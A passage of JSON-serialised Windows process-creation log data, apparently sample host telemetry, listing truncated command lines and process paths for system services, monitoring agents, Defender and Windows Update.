-Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"cmdline unknown\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"cmdline unknown\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"...\",\"ping 127.0.0.1 -n 18 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"ping 127.0.0.1 -n 18 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:...\",\"ping 127.0.0.1 -n 18 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C...\",\"cmdline unknown\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\Windo...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\\\" -sta...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\Windo...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\Windo...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\Windo...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\Windo...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\Windo...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\Windo...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\\\" -sta...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\Windo...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\Windo...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\Windo...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\Windo...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\Windo...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\Windo...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\\\" -sta...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\Windo...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\Windo...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\Windo...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\Windo...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"cmdline unknown\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platfor...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platfor...\",\"\\\"C:\\\\Windows\\\\SERVIC~2\\\\NETWOR~1\\\\AppData\\\\Local\\\\Temp\\\\m...\",\"C:\\\\Windows\\\\SERVIC~2\\\\NETWOR~1\\\\AppData\\\\Local\\\\Temp\\\\90...\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platfor...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platfor...\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platfor...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platfor...\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platfor...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -Fo...\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platfor...\",\"cmdline unknown\",\"wmiadap.exe /D /T\",\"\\\"C:\\\\Windows\\\\system32\\\\wermgr.exe\\\" \\\"-outproc\\\" \\\"0\\\" \\\"2...\",\"\\\"C:\\\\Windows\\\\system32\\\\wuauclt.exe\\\" /RunHandlerComSe...\",\"\\\"C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\Install\\\\...\",\"C:\\\\Windows\\\\system32\\\\MpSigStub.exe /stub 1.1.15500....\",\"\\\"C:\\\\Windows\\\\system32\\\\wermgr.exe\\\" \\\"-outproc\\\" \\\"0\\\" \\\"2...\"],\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362,363,364,365,366,367,368,369,370,371,372,373,374,375,376,377,378,379,380,381,382,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,420,421,422,423,424,425,426,427,428,429,430,431,432,433,434,435,436,437,438,439,440,441,442,443,444,445,446,447,448,449,450,451,452,453,454,455,456,457,458,459,460,461,462,463,464,465,466,467,468,469,470,471,472,473,474,475,476,477,478,479,480,481,482,483,484,485,486,487,488,489,490,491,492,493,494,495,496,497,498,499,500,501,502,503,504,505,506,507,508,509,510,511,512,513,514,515,516,517,518,519,520,521,522,523,524,525,526,527,528,529,530,531,532,533,534,535,536,537,538,539,540,541,542,543,544,545,546,547,548,549,550,551,552,553,554,555,556,557,558,559,560,561,562,563,564,565,566,567,568,569,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,595,596,597,598,599,600,601,602,603,604,605,606,607,608,609,610,611,612,613,614,615,616,617,618,619,620,621,622,623,624,625,626,627,628,629,630,631,632,633,634,635,636,637,638,639,640,641,642,643,644,645,646,647,648,649,650,651,652,653,654,655,656,657,658,659,660,661,662,663,664,665,666,667,668,669,670,671,672,673,674,675,676,677,678,679,680,681,682,683,684,685,686,687,688,689,690,691,692,693,694,695,696,697,698,699,700,701,702,703,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,731,732,733,734,735,736,737,738,739,740,741,742,743,744,745,746,747,748,749,750,751,752,753,754,755,756,757,758,759,760,761,762,763,764,765,766,767,768,769,770,771,772,773,774,775,776,777,778,779,780,781,782,783,784,785,786,787,788,789,790,791,792,793,794,795,796,797,798,799,800,801,802,803,804,805,806,807,808,809,810,811,812,813,814,815,816,817,818,819,820,821,822,823,824,825,826,827,828,829,830,831,832,833,834,835,836,837,838,839,840,841,842,843,844,845,846,847,848,849,850,851,852,853,854,855,856,857,858,859,860,861,862,863,864,865,866,867,868,869,870,871,872,873,874,875,876,877,878,879,880,881,882,883,884,885,886,887,888,889,890,891,892,893,894,895,896,897,898,899,900,901,902,903,904,905,906,907,908,909,910,911,912,913,914,915,916,917,918,919,920,921,922,923,924,925,926,927,928,929,930,931,932,933,934,935,936,937,938,939,940,941,942,943,944,945,946,947,948,949,950,951,952,953,954,955,956,957,958,959,960,961,962,963,964,965,966,967,968,969,970,971,972,973,974,975,976,977,978,979,980,981,982,983,984,985,986,987,988,989,990,991,992,993,994,995,996,997,998,999,1000,1001,1002,1003,1004,1005,1006,1007,1008,1009],\"new_process_lc\":[\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\dllhost.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\system32\\\\unlodctr.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\microsoft.net\\\\framework64\\\\v4.0.30319\\\\csc.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\microsoft.net\\\\framework64\\\\v4.0.30319\\\\cvtres.exe\",\"c:\\\\windows\\\\system32\\\\lodctr.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\werfault.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\mof\\\\mofwriter.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\dsc\\\\asmhost.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\secedit.exe\",\"c:\\\\windows\\\\system32\\\\secedit.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3473\\\\webbinaries\\\\microsoft.sirona.oms.security.baselineassessment.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\momperfsnapshothelper.exe\",\"c:\\\\program files\\\\microsoft monitoring 